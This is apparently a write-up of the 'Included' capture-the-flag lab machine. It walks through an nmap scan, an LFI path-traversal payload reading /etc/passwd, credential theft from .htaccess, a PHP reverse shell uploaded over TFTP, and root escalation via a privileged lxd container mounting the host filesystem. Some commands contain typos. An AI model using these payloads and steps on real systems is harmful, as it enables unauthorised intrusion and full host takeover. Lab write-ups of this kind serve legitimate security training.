Included
Personal Rating: Easy
Enumeration
Running an initial nmap scan:
sudo nmap <IP>
80/tcp open http
68/udp open|filtered dhcpc
69/udp open|filtered tftpPHP Path Traversal
I quickly found an LFI approach
/script.php?page=../../../../../../etc/passwd
root:x:0:O:root:/root:/bin/bash
<SNIP>
mike:x: 1000: 1000:mike:/home/mike:/bin/bash
tftp:x:110:113:So the first user seems to be 'mike'.
Since we have the tftp user and the port 69 open, I searched for the tftp default folder, which is /var/lib/tftpboot.
I tried some command executions using php wrappers with the LFI, but that didn't work.
Initial Access
I found mike's credentials in the file '.htaccess'.
Through the LFI I also found out that the user is a member of the lxd group, which opens up this privilege escalation path:
But first I have to get a shell. I uploaded a webshell using the tftp share:
Tftp 10.129.95.185
> put php-reverse-shell.php I fetched the shell an upgraded it to a fully interactive one:
python3 –c 'import pty; pty.spawn("/bin/bash")'LXD Group Abuse to root
I then used the tftp port to transfer an alpine linux container on to the host to exploit the lxd group.
Lxc init
Lxc import container –alias privesc
Lxc image list
Lxc init privesc privesc-container –c security.privileged=true //by default lxc spawns unprivileged containers and does UID mapping. With the option, UID 0 in the container is mapped to UID 0 on the host (root)
Lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
Lxc start privesc-container && lxc list
Lxc exec privesc-container /bin/sh
# cat /mnt/root/root/root.txt Last updated